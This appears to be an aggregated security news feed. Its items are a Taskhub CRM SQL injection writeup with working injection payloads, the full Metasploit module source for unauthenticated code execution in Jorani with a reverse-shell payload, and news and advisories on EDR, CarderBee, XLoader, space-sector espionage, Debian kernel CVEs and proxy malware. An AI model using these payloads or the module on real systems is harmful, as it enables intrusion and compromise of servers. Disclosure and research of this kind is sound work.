Taskhub CRM Tool version 2.8.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###GET /projects?filter=notstarted HTTP/1.1Host: localhostCookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close### Parameter & Payloads ###Parameter: filter (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQOType: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: filter=notstarted' ANDEXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ

Taskhub CRM Tool 2.8.6 SQL Injection

Categories: Business
Defeat alert fatigue using specialized threat intelligence.



(Read more...)




The post Alert Prioritization and Guided Remediation: The future of EDR appeared first on Malwarebytes Labs.

Sleepless nights, missed threats, a deluge of notifications—the common symptoms of _the_ bane of IT teams everywhere: Alert fatigue.

Out of the litany of problems IT teams face every day, alert fatigue might be among the most pressing—especially considering that 30 percent of EDR alerts are ignored by IT security teams. Simply put, it’s impossible to keep up when your tools aren’t helping you prioritize alerts.

Enter: Alert Prioritization and Guided Remediation.

Alert Prioritization and Guided Remediation is a feature of EDR Extra Strength that helps IT teams cut through the noise, using specialized threat intelligence to highlight the threats that truly need their attention.

But why do traditional approaches to EDR alert ranking lead to alert fatigue? And how does Alert Prioritization and Guided Remediation work to combat it?

**Why Traditional EDR Is Inherently Exhausting**

At its core, EDR has one job—to generate alerts of suspicious activity. The humans operating EDR also broadly have one job: to interpret and act on that suspicious activity.

But here’s the problem: "suspicious" could mean anything.

Let’s say an alert was generated in response to an employee installing a new piece of software attempting to modify system files. Traditional EDR doesn’t know if this is a benign program—it just flags the activity as suspicious. But "suspicious" could mean that the alert is a false positive, it could mean the alert is malicious but can be safely ignored; it could mean “This is a huge deal.”

In other words, IT teams can’t know how “bad” a suspicious alert is until it is investigated—an impossible task for each of the thousands of alerts generated by EDR daily. The end result is, of course, alert fatigue.

Traditional EDR is inherently exhausting. Without additional context, alerts become just too ambiguous to be actionable, meaning IT teams inevitably end up over-prioritizing less urgent threats while also overlooking severe ones.

**How Alert Prioritization And Guided Remediation Works**

Alert Prioritization and Guided Remediation helps you cut through the noise of traditional EDR by enriching alerts with external threat intelligence.

In this scenario, when an EDR product generates an alert, Alert Prioritization and Guided Remediation consults the threat intelligence service's extensive database for relevant data. This data, which could include information from various antivirus solutions and user submissions, helps Alert Prioritization and Guided Remediation assess the legitimacy of the alert, clarifying whether the alert represents a genuine threat or a false positive.

Let’s illustrate using the same example from our section on the limitations of traditional EDR, when an alert was generated after an employee installed a new piece of software.

If threat intelligence data shows, for example, that 50 out of 60 antivirus solutions flagged the same file as malicious, it's likely not a false positive.

Alternatively, if threat intelligence data shows that only 2 out of 60 antivirus solutions flagged the same file as malicious, it is likely that the alert is a false positive and can be safely ignored.

After the threat is externally validated to be a known bad, we turn to Phase 2: Guided Remediation.

When a prioritized threat is detected, Guided Remediation sends detailed remediation information directly to customers through text and email.

These communications direct customers to an EDR portal page that further details the identified threat, explaining what was found, why it is deemed a priority, and simple steps on how to remediate it. This ensures that users are not only alerted to potential threats, but also equipped with the information needed to take decisive action.

**Business benefits to Alert Prioritization and Guided Remediation****Reduced alert fatigue**

Alert Prioritization and Guided Remediation helps IT teams massively reduce the volume of alerts that need to be reviewed, saving them much-needed mental to focus on only the most critical threats.

**Improved security posture**

Alert Prioritization and Guided Remediation of threats allows for quicker detection and response to threats, minimizing attacker dwell time and reducing the potential damage that attackers can cause once in your systems.

**Empowers smaller or less experienced teams**

With the right solution, highly specialized staff become a less critical requirement when an organization has to keep up with the volume of EDR alerts. Alert Prioritization and Guided Remediation helps to level the playing field, helping smaller IT teams or those with lower levels of specialized security expertise identify and respond to threats on the fly.

**Try EDR Extra Strength today**

Automation is the name of the game when it comes to preventing burnout—and with Alert Prioritization and Guided Remediation, IT teams can finally ease their alert fatigue burdens.

Interested in learning more? Alert Prioritization and Guided Remediation is a part of our EDR Extra Strength product, which reimagines EDR to deliver superior protection in a single, easy-to-use package.

Get a free trial of Malwarebytes EDR Extra Strength.

Alert Prioritization and Guided Remediation: The future of EDR

The hackers, who mostly targeted victims in Hong Kong, also hijacked Microsoft’s trust model to make their malware harder to detect.

Every software supply chain attack, in which hackers corrupt a legitimate application to push out their malware to hundreds or potentially thousands of victims, represents a disturbing new outbreak of a cybersecurity scourge. But when that supply chain attack is pulled off by a mysterious group of hackers, abusing a Microsoft trusted software model to make their malware pose as legitimate, it represents a dangerous and potentially new adversary worth watching.

Today, researchers on the Threat Hunter Team at Broadcom-owned security firm Symantec revealed that they'd detected a supply chain attack carried out by a hacker group that they've newly named CarderBee. According to Symantec, the hackers hijacked the software updates of a piece of Chinese-origin security software known as Cobra DocGuard, injecting their own malware to target about 100 computers across Asia, mostly in Hong Kong. Though some clues, like the exploitation of DocGuard and other malicious code they installed on victim machines, loosely link CarderBee with previous Chinese state-sponsored hacking operations, Symantec declined to identify CarderBee as any previously known group, suggesting it may be a new team.

Beyond the usual disturbing breach of trust in legitimate software that occurs in every software supply chain, Symantec says, the hackers also managed to get their malicious code—a backdoor known as Korplug or PlugX and commonly used by Chinese hackers—digitally signed by Microsoft. The signature, which Microsoft typically uses to designate trusted code, made the malware far harder to detect.

“Any time we see a software supply chain attack, it’s somewhat interesting. But in terms of sophistication, this is a cut above the rest,” says Dick O'Brien, a principal intelligence analyst on Symantec's research team. “This one has the hallmarks of an operator who knows what they’re doing.”

Cobra DocGuard, which is ironically marketed as security software for encrypting and protecting files based on a system of users' privileges inside an organization, has around 2,000 users, according to Symantec. So the fact that the hackers chose just 100 or so machines on which to install their malware—capable of everything from running commands to recording keystrokes—suggests that CarderBee may have combed thousands of potential victims to specifically target those users, O’Brien argues. Symantec declined to name the targeted victims or say whether they were largely government or private sector companies.

The Cobra DocGuard application is distributed by EsafeNet, a company owned by the security firm Nsfocus, which was founded in Mainland China in 2000 but now describes its headquarters as Milpitas, California. Symantec says it can't explain how CarderBee managed to corrupt the company's application, which in many software supply chain attacks involves hackers breaching a software distributor to corrupt their development process. Nsfocus didn't respond to WIRED's request for comment.

Symantec's discovery isn't actually the first time that Cobra DocGuard has been used to distribute malware. Cybersecurity firm ESET found that in September of last year a malicious update to the same application was used to breach a Hong Kong gambling company and plant a variant of the same Korplug code. ESET found that the gambling company also had been breached via the same method in 2021.

ESET pinned that earlier attack on the hacker group known as LuckyMouse, APT27, or Budworm, which is widely believed to be based in China and has for more than a decade targeted government agencies and government-related industries, including aerospace and defense. But despite the Korplug and CobraGuard connections, Symantec says it's too early to link the wider supply chain attack it has uncovered to the group behind the previous incidents.

“You can't rule out the idea that one APT group compromises this software, and then it becomes known that this software is vulnerable to this kind of compromise, and somebody else does it as well,” says Symantec's O'Brien, using the term APT to mean “advanced, persistent threat,” a common industry term for state-sponsored hacker groups. “We don't want to jump to conclusions.” O'Brien notes that another Chinese group, known as APT41 or Barium, has also carried out numerous supply chain attacks—perhaps more than any other team of hackers—and has used Korplug, too.

To add to the attack's stealth, the CarderBee hackers managed to somehow deceive Microsoft into lending extra legitimacy to their malware: They tricked the company into signing the Korplug backdoor with the certificates Microsoft uses in its Windows Hardware Compatibility Publisher program to designate trusted code, making it look far more legit than it is. That program typically requires a developer to register with Microsoft as a business entity and submit their code to Microsoft for approval. But the hackers appear to have obtained a Microsoft signature through either developer accounts they created themselves or obtained from other registered developers. Microsoft didn't respond to WIRED's request for more information on how it ended up signing malware used in the hackers' supply chain attack.

Malware that's signed by Microsoft is a long-running problem. Getting access to a registered developer account represents a hurdle to hackers, says Jake Williams, a former US National Security Agency hacker now on faculty at the Institute for Applied Network Security. But once that account is obtained, Microsoft is known to take a lax approach to vetting registered developers' code. “They typically sign whatever you, as the developer, submit,” Williams says. And those signatures can, in fact, make malware far harder to spot, he adds. “So many folks, when they threat-hunt, they start by exempting things that are signed by Microsoft,” Williams says.

That code-signing trick, combined with a well-executed supply chain attack, suggests a level of sophistication that makes CarderBee uniquely worthy of tracking, says Symantec's O'Brien—even for those outside of its current targeting in Hong Kong or Chinese neighbor countries. Regardless of whether you’re in China’s orbit, says O’Brien, “it’s certainly one to look out for.”

New Supply Chain Attack Hit Close to 100 Victims—and Clues Point to China

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."
"The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application

Malware / Endpoint Security

A new variant of an Apple macOS malware called **XLoader** has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."

"The new version of **XLoader** is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)."

XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file.

"Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE with Macs over a decade ago," the cybersecurity firm noted at the time.

The latest iteration of XLoader gets around this limitation by switching to programming languages such as C and Objective C, with the disk image file signed on July 17, 2023. Apple has since revoked the signature.

SentinelOne said it detected multiple submissions of the artifact on VirusTotal all through the month of July 2023, indicating a widespread campaign.

"Advertisements on crimeware forums offer the Mac version for rental at $199/month or $299/3 months," the researchers said. "Interestingly, this is relatively expensive compared to Windows variants of XLoader, which go for $59/month and $129/3 months."

Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence.

XLoader is designed to harvest clipboard data as well as information stored in the directories associated with web browsers such as Google Chrome and Mozilla Firefox. Safari, however, is not targeted.

Besides taking steps to evade analysis both manually and by automated solutions, the malware is configured to run sleep commands to delay its execution and avoid raising any red flags.

"XLoader continues to present a threat to macOS users and businesses," the researchers concluded.

"This latest iteration masquerading as an office productivity application shows that the targets of interest are clearly users in a working environment. The malware attempts to steal browser and clipboard secrets that could be used or sold to other threat actors for further compromise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

By Habiba Rashid
Foreign cyber spies are targeting the US space industry for secrets and technology, warns the FBI, NCSC, and AFOSI.
This is a post from HackRead.com Read the original post: FBI and NCSC Warn of Foreign Cyberattacks on US Space Sector

*   **Authorities warn of foreign cyber spies targeting the US space industry.**

*   **Beijing and Moscow are major sources of cyber threats, according to the US.**

*   **Tactics include cyberattacks, investments, and recruitment, says the FBI.**

*   **The US space sector’s significance increases vulnerability.**

*   **Advisory stresses safeguarding data and reporting suspicions.**

In a joint advisory published on Friday, the Federal Bureau of Investigation (FBI), the National Counterintelligence and Security Center (NCSC), and the Air Force Office of Special Investigations (AFOSI) issued a warning about the escalating threat of nation-state-sponsored cyber espionage targeting companies within the US space industry.

The report underscores the heightened risks posed by cyberattacks and other covert methods employed by foreign intelligence entities to pilfer research, trade secrets, and sensitive information related to the burgeoning sector.

Beijing and Moscow, the advisory points out, loom large as the main sources of these threats, with the FBI and other intelligence agencies identifying these capitals as prime actors in these ongoing campaigns. 

“We anticipate growing threats to this burgeoning sector of the US economy,” a counterintelligence official emphasized in a statement to Reuters.

As the global space economy is predicted to surge from $469 billion in 2021 to over $1 trillion by 2030, with the United States driving this growth, the vulnerability of the US space industry to foreign espionage has intensified, the report stated. 

Foreign intelligence entities are employing a multifaceted approach to access sensitive information crucial to their respective space programs. Techniques include cyberattacks, strategic investments, supply chain node targeting, and manipulation of joint business ventures and acquisitions.

The advisory also sheds light on espionage agents attending industry conferences and even requesting visits to industry facilities in pursuit of confidential data.

The report also highlights a tactic involving the recruitment of individual employees through offers of overseas work or consulting positions, along with direct offers of payment in exchange for intellectual property. The agencies underscore the importance of vigilance among US space companies and recommend immediate contact with the FBI or AFOSI in case of suspicious activities.

“Foreign intelligence entities recognize the importance of the commercial space industry to the US economy and national security,” the advisory states. It highlights that not only does the industry contribute significantly to emergency services, energy, financial services, telecommunications, transportation, food, and agriculture, but its role is also pivotal in supporting critical infrastructure that underpins these domains.

US authorities, while not naming any specific countries, highlight the persistent and well-documented threats from Chinese hackers in the aviation, space, and satellite technology sectors. Chinese ambitions to challenge the United States space supremacy have been evident for years, with the Chinese government openly outlining its intention to lead the world in space exploration and technology by 2045.

In light of these intensifying espionage campaigns, the joint advisory urges safeguarding sensitive information and proprietary technologies within the US space industry.

FBI and NCSC Warn of Foreign Cyberattacks on US Space Sector


Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager versions 2023.2.19 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature.



**DEVO-2023-0015****Summary**

Remote Desktop Manager Windows is affected by multiple security vulnerabilities.

**Affected Products**

Remote Desktop Manager Windows

**Change Log**

Initial Publication - 2023-08-21

**Severity**

Medium

**Product**

Remote Desktop Manager Windows

**Fix Version**

2023.2.22

**Unauthorized Connection Exploit via Remote Tools in Remote Desktop Manager****Description**

Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager versions 2023.2.19 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.2.22 and higher.

**Severity**

Medium - 3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Affected Products**

Remote Desktop Manager Windows 2023.2.19 and earlier.

**CVE(s)**

CVE-2023-4373

**Incorrect vault used for the duplicate entry feature.****Description**

Improper access controls in the entry duplication component in Devolutions Remote Desktop Manager 2023.2.19 and earlier versions on Windows allows an authenticated user, under specific circumstances, to inadvertently share their personal vault entry with shared vaults via an incorrect vault in the duplication write process.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.2.22 and higher.

**Severity**

Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N 5.7

**Affected Products**

Remote Desktop Manager Windows 2023.2.19 and earlier.

**CVE(s)**

CVE-2023-4417

CVE-2023-4373: Devolutions

Improper access controls in the entry duplication component in Devolutions Remote Desktop Manager 2023.2.19 and earlier versions on Windows allows an authenticated user, under specific circumstances, to inadvertently share their personal vault entry with shared vaults via an incorrect vault in the duplication write process.

CVE-2023-4417: Devolutions

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Jorani versions prior to 1.0.2. It abuses log poisoning and redirection bypass via header spoofing and then it uses path traversal to trigger the vulnerability. It has been tested on Jorani 1.0.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Jorani unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.          It has been tested on Jorani 1.0.0.        },        'License' => MSF_LICENSE,        'Author' => [          'RIOUX Guilhem (jrjgjk)'        ],        'References' => [          ['CVE', '2023-26469'],          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']        ],        'Platform' => %w[php],        'Arch' => ARCH_PHP,        'Targets' => [          ['Jorani < 1.0.2', {}]        ],        'DefaultOptions' => {          'PAYLOAD' => 'php/meterpreter/reverse_tcp',          'RPORT' => 443,          'SSL' => true        },        'DisclosureDate' => '2023-01-06',        'Privileged' => false,        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])      ]    )  end  def get_version(res)    footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text    matches = footer_text.scan(/v([0-9.]+)/i)    if matches.nil? || matches[0].nil?      print_error('Cannot recovered Jorani version...')      return nil    end    matches[0][0]  end  def service_running(res)    matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/)    if matches.nil?      print_error("Jorani doesn't appear to be running on the target")      return false    end    true  end  def recover_csrf(res)    csrf_token = res.get_html_document.xpath('//input[@name="csrf_test_jorani"]/@value').text    return csrf_token if csrf_token.length == 32    nil  end  def check    # For the check command    print_status('Checking Jorani version')    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'uri' => "#{uri}/session/login"    )    if res.nil?      return Exploit::CheckCode::Safe('There was a problem accessing the login page')    end    return Exploit::CheckCode::Safe unless service_running(res)    print_good('Jorani seems to be running on the target!')    current_version = get_version(res)    return Exploit::CheckCode::Detected if current_version.nil?    print_good("Found version: #{current_version}")    current_version = Rex::Version.new(current_version)    return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')    Exploit::CheckCode::Safe  end  def exploit    # Main function    print_status('Trying to exploit LFI')    path_trav_payload = '../../application/logs'    header_name = Rex::Text.rand_text_alpha_upper(16)    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"    uri = normalize_uri(target_uri.path, 'index.php')    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/session/login"    )    if res.nil?      print_error('There was a problem accessing the login page')      return    end    print_status('Recovering CSRF token')    csrf_tok = recover_csrf(res)    if csrf_tok.nil?      print_status('CSRF not found, doesn\'t mean its not vulnerable')    else      print_good("CSRF found: #{csrf_tok}")    end    print_status('Poisoning log with payload..')    print_status('Sending 1st payload')    send_request_cgi(      'method' => 'POST',      'keep_cookies' => true,      'uri' => "#{uri}/session/login",      'data' => "csrf_test_jorani=#{csrf_tok}&"                  \                'last_page=session/login&'                       \                "language=#{path_trav_payload}&"                 \                "login=#{Rex::Text.uri_encode(poison_payload)}&" \                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"    )    print_status("Including poisoned log file #{log_file_name}.php")    vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')    print_good('Triggering payload')    send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => "#{uri}/pages/view/#{log_file_name}",      'headers' =>      {        'X-REQUESTED-WITH' => 'XMLHttpRequest',        header_name => Rex::Text.rand_text_alpha(14)      }    )    nil  endend

Jorani Remote Code Execution

Debian Linux Security Advisory 5480-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5480-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 18, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-4269 CVE-2022-39189 CVE-2023-1206 CVE-2023-1380  
                 CVE-2023-2002 CVE-2023-2007 CVE-2023-2124 CVE-2023-2269  
                 CVE-2023-2898 CVE-2023-3090 CVE-2023-3111 CVE-2023-3212  
                 CVE-2023-3268 CVE-2023-3338 CVE-2023-3389 CVE-2023-3609  
                 CVE-2023-3611 CVE-2023-3776 CVE-2023-3863 CVE-2023-4004  
                 CVE-2023-4128 CVE-2023-4132 CVE-2023-4147 CVE-2023-4194  
                 CVE-2023-4273 CVE-2023-20588 CVE-2023-21255 CVE-2023-21400  
                 CVE-2023-31084 CVE-2023-34319 CVE-2023-35788 CVE-2023-40283

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2022-4269

    William Zhao discovered that a flaw in the Traffic Control (TC)  
    subsystem when using a specific networking configuration  
    (redirecting egress packets to ingress using TC action "mirred"),  
    may allow a local unprivileged user to cause a denial of service  
    (triggering a CPU soft lockup).

CVE-2022-39189

    Jann Horn discovered that TLB flush operations are mishandled in the  
    KVM subsystem in certain KVM_VCPU_PREEMPTED situations, which may  
    allow an unprivileged guest user to compromise the guest kernel.

CVE-2023-1206

    It was discovered that the networking stack permits attackers to  
    force hash collisions in the IPv6 connection lookup table, which may  
    result in denial of service (significant increase in the cost of  
    lookups, increased CPU utilization).

CVE-2023-1380

    Jisoo Jang reported a heap out-of-bounds read in the brcmfmac Wi-Fi  
    driver. On systems using this driver, a local user could exploit  
    this to read sensitive information or to cause a denial of service.

CVE-2023-2002

    Ruiahn Li reported an incorrect permissions check in the Bluetooth  
    subsystem. A local user could exploit this to reconfigure local  
    Bluetooth interfaces, resulting in information leaks, spoofing, or  
    denial of service (loss of connection).

CVE-2023-2007

    Lucas Leong and Reno Robert discovered a time-of-check-to-time-of-  
    use flaw in the dpt_i2o SCSI controller driver. A local user with  
    access to a SCSI device using this driver could exploit this for  
    privilege escalation.

    This flaw has been mitigated by removing support for the I2OUSRCMD  
    operation.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-2898

    It was discovered that missing sanitising in the f2fs file  
    system may result in denial of service if a malformed file  
    system is accessed.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3111

    The TOTE Robot tool found a flaw in the Btrfs filesystem driver that  
    can lead to a use-after-free. It's unclear whether an unprivileged  
    user can exploit this.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3338

    Davide Ornaghi discovered a flaw in the DECnet protocol  
    implementation which could lead to a null pointer dereference or  
    use-after-free. A local user can exploit this to cause a denial of service  
    (crash or memory corruption) and probably for privilege escalation.

    This flaw has been mitigated by removing the DECnet protocol  
    implementation.

CVE-2023-3389

    Querijn Voet discovered a use-after-free in the io_uring subsystem,  
    which may result in denial of service or privilege escalation.

CVE-2023-3611

    It was discovered that an out-of-bounds write in the traffic control  
    subsystem for the Quick Fair Queueing scheduler (QFQ) may result in  
    denial of service or privilege escalation.

CVE-2023-3609 / CVE-2023-3776 / CVE-2023-4128

    It was discovered that a use-after-free in the cls_fw, cls_u32,  
    cls_route and network classifiers may result in denial of service or  
    potential local privilege escalation.

CVE-2023-3863

    It was discovered that a use-after-free in the NFC implementation  
    may result in denial of service, an information leak or potential  
    local privilege escalation.

CVE-2023-4004

    It was discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4132

    A use-after-free in the driver for Siano SMS1xxx based MDTV  
    receivers may result in local denial of service.

CVE-2023-4147

    Kevin Rich discovered a use-after-free in Netfilter when adding a  
    rule with NFTA_RULE_CHAIN_ID, which may result in local privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

CVE-2023-4194

    A type confusion in the implementation of TUN/TAP network devices  
    may allow a local user to bypass network filters.

CVE-2023-4273

    Maxim Suhanov discovered a stack overflow in the exFAT driver, which  
    may result in local denial of service via a malformed file system.

CVE-2023-20588

    Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Koepf and  
    Oleksii Oleksenko discovered that on some AMD CPUs with the Zen1  
    micro architecture an integer division by zero may leave stale  
    quotient data from a previous division, resulting in a potential  
    leak of sensitive data.

CVE-2023-21255

    A use-after-free was discovered in the in the Android binder driver,  
    which may result in local privilege escalation on systems where the  
    binder driver is loaded.

CVE-2023-21400

    Ye Zhang and Nicolas Wu discovered a double-free in the io_uring  
    subsystem, which may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-34319

    Ross Lagerwall discovered a buffer overrun in Xen's netback driver  
    which may allow a Xen guest to cause denial of service to the  
    virtualisation host my sending malformed packets.

CVE-2023-35788

    Hangyu Hua that an off-by-one in the Flower traffic classifier may  
    result in local of service or the execution of privilege escalation.

CVE-2023-40283

    A use-after-free was discovered in Bluetooth L2CAP socket handling.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.191-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTfvC5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QmDBAAnjvIhfwWPmYeanAyC9Hwdx2L9ATqx235c5K4I9xOWCRR+1oiM3WIKDz1  
jnFbRnCKEPMUeIMWaSwXj11OvjDIY31nnUqRzf/hoT8PQ6dHi1p/fpmjReLFL9sw  
FoYhyabKtkGMBUXF4dCz2Qn62yPGFDgupBMlK1BQ1kJvxZABaKG0PGTqqPX4iOla  
DkbNvwq2lLr0K6oYKp8Nu+tQ+1I6U8PI4EvAlYbybvo0WXvbZy9pOmBilJhBqYrC  
6Ql1ndovBzDi3H8Qo+C8WJRdFcjP+dBOpW/lu9EcHbNmHG1cWLO8EexqvfoW8GAV  
qf0CEtULUwsn6pM5uW+SEgfsiETFPXbzQt+FxH2L2NGLhLmb73dIK074/Ids8lx4  
V4tNh+pVTli+sTCB6uGaRQvM4uNTxm5mV9+saacM6vel6KvD/qRreCMCDhvk9CkS  
ETg3sJjbw/Hv83RwfqTlXicJh5KpA5JikrztMnHNAQKru93uSH6dOLpOd45/SeA8  
KHw604LkeuzAiqFltE76HS1h/jDXO0Mfb0UvIH5N1tmgcr3qaRaFvZQ6sYy8NTHa  
6N5pnfKJJXRuYe/aadjlC2xQmUMvU8HD39dqp6Z+XFjjzLmz5NN9rLHZKqaLSx6C  
IFId+FMkkKLeQFWylM+mA5WwiUTEx0JvREFPjtOjJ4RDHf3Mmws=  
=z/8h  
-----END PGP SIGNATURE-----

Debian Security Advisory 5480-1

By Habiba Rashid
Malware-Driven Proxy Servers Exploit Unsuspecting Users.
This is a post from HackRead.com Read the original post: New Malware Turns Windows and macOS Devices into Proxy Nodes

*   **Malware transforms Windows and macOS devices into proxy nodes.**
*   **Compromised machines reroute traffic as covert proxy exit points.**
*   **Malicious actors exploit infected systems for proxy requests.**
*   **Windows and macOS devices were repurposed for unauthorized activities.**
*   **AT&T Alien Labs reveals an alarming malware-driven proxy phenomenon.**

The cybersecurity researchers at AT&T Alien Labs have shed light on an alarming phenomenon where malicious actors are harnessing malware-infected Windows and macOS machines as proxy exit nodes to reroute proxy requests.

These actors, utilizing a proxy server application, are covertly leveraging compromised systems to establish proxy exit nodes, enabling them to redirect proxy requests. It appears that these proxy exit nodes are not exclusively originating from users who have knowingly agreed to participate, as the proxy service’s website claims.

The attack vector involves delivering proxy servers through various malware strains that target unsuspecting users enticed by offers of cracked software and games. The proxy application, coded using the versatile Go programming language, ensures compatibility across multiple operating systems, including macOS and Windows.

One striking observation is the difference in the detection rates between macOS and Windows systems. While the Windows version of the proxy application effortlessly evades security measures due to its signed nature, the macOS variant is more easily detected. 

According to AT&T’s blog post, Once executed on a compromised system, the malware discreetly installs the proxy application, sidestepping user interaction and simultaneously introducing additional malware or adware components. To achieve this covert process, the malware creators employ Inno Setup, a widely-used Windows installer. This tool enables the creation of packed executables, facilitating the proxy’s seamless installation and persistence within the system.

The nature of the malware-driven proxy server extends to its communication with the command and control server (C&C). The proxy application not only relays specific parameters to the C&C but also collects critical information about the compromised system, including processes, CPU and memory usage, and even battery status. This adaptive data collection ensures the proxy’s optimal performance and responsiveness while evading suspicion.

